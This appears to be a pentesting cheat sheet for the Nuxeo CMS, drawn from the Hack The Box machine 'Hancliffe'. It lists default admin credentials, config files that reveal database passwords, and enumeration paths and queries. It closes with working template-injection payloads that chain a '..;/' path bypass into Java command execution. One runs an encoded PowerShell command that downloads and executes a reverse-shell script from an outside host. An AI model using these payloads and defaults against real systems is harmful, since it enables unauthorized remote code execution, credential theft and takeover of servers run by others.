Nuxeo

rce, cms, enum, java, ssti, web

Oveview #

Version Detection #

# Version is 10.2
Copyright © 2001-2022 Nuxeo and respective authors. Nuxeo Platform FT 10.2

Credentials #

# Default
Administrator:Administrator

# Some DB Users to try
nuxeo

Interesting Files and Directories #

# Nuxeo config. You can see DB passwords here.
C:\programdata\nuxeo\conf\nuxeo.conf

# Some tomcat config
conf/

# User settings?
~/.nxshell
C:\users\svc_account\.nxshell\history
C:\users\svc_account\.nxshell\shell.properties

Interesting URL paths #

/nuxeo
/nuxeo/login.jsp
/nxserver
/nxstartup.faces

Interesting Database Tables #

users
digestauth
content
groups
userinfo
note

Interesting Elasticearch Data #

curl 'http://localhost:9200/nuxeo-audit/_search?pretty=true'
curl 'http://localhost:9200/nuxeo/_search?pretty=true'

Vulnerabilities, Attacks and Exploits #

# HTB Hancliffe payload. Take note there is a URI parsing
# vulnerability that's why there is a `/maintenance/..;/`
http://hancliffe/maintenance/..;/login.jsp/pwn$%7B7+7%7D.xhtml

# Another payload but with powershell encoded command
http://hancliffe/maintenance/..;/login.jsp/pwn$%7B%22%22.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22powershell%20-encodedcommand%20SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMANAAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQA=%22,null).waitFor()%7D.xhtml

References #